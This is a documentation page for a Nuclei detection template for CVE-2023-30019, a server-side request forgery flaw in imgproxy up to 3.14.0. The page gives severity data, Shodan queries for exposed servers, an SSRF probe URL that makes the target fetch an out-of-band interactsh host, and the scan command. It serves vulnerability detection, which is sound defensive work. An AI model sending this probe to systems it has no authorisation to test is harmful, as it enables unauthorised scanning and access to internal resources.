Imgproxy <= 3.14.0 - Server-side request forgery (SSRF)
ID: CVE-2023-30019
Severity: medium
Author: DhiyaneshDK
Tags: cve,cve2023,imgproxy,ssrf,oast,evilmartians
Description
Section titled “Description”imgproxy <=3.14.0 is vulnerable to Server-Side Request Forgery (SSRF) due to a lack of sanitization of the imageURL parameter.
YAML Source
Section titled “YAML Source”id: CVE-2023-30019
info: name: Imgproxy <= 3.14.0 - Server-side request forgery (SSRF) author: DhiyaneshDK severity: medium description: | imgproxy <=3.14.0 is vulnerable to Server-Side Request Forgery (SSRF) due to a lack of sanitization of the imageURL parameter. impact: | Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, data leakage, and potential remote code execution. remediation: | Upgrade to a version of Imgproxy that is not affected by this vulnerability. reference: - https://breakandpray.com/cve-2023-30019-ssrf-in-imgproxy/ - https://github.com/imgproxy/imgproxy - https://github.com/j4k0m/godkiller classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2023-30019 cwe-id: CWE-918 epss-score: 0.0016 epss-percentile: 0.52577 cpe: cpe:2.3:a:evilmartians:imgproxy:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: evilmartians product: imgproxy shodan-query: - "Server: imgproxy" - "server: imgproxy" tags: cve,cve2023,imgproxy,ssrf,oast,evilmartians
http: - method: GET path: - "{{BaseURL}}/111/rs:fit:400:400:0:0/plain/http://{{interactsh-url}}"
matchers-condition: and matchers: - type: word words: - Invalid source image
- type: status status: - 422# digest: 4a0a0047304502204f655aa6ae46c426940783b881c6cdb12537f18ca4acfefc0251420cd29b23eb022100a8e6cb30e5d3e99987d9468a2dab27290e638d9bc8cd5be7bff4a949efa089ce:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-30019.yaml"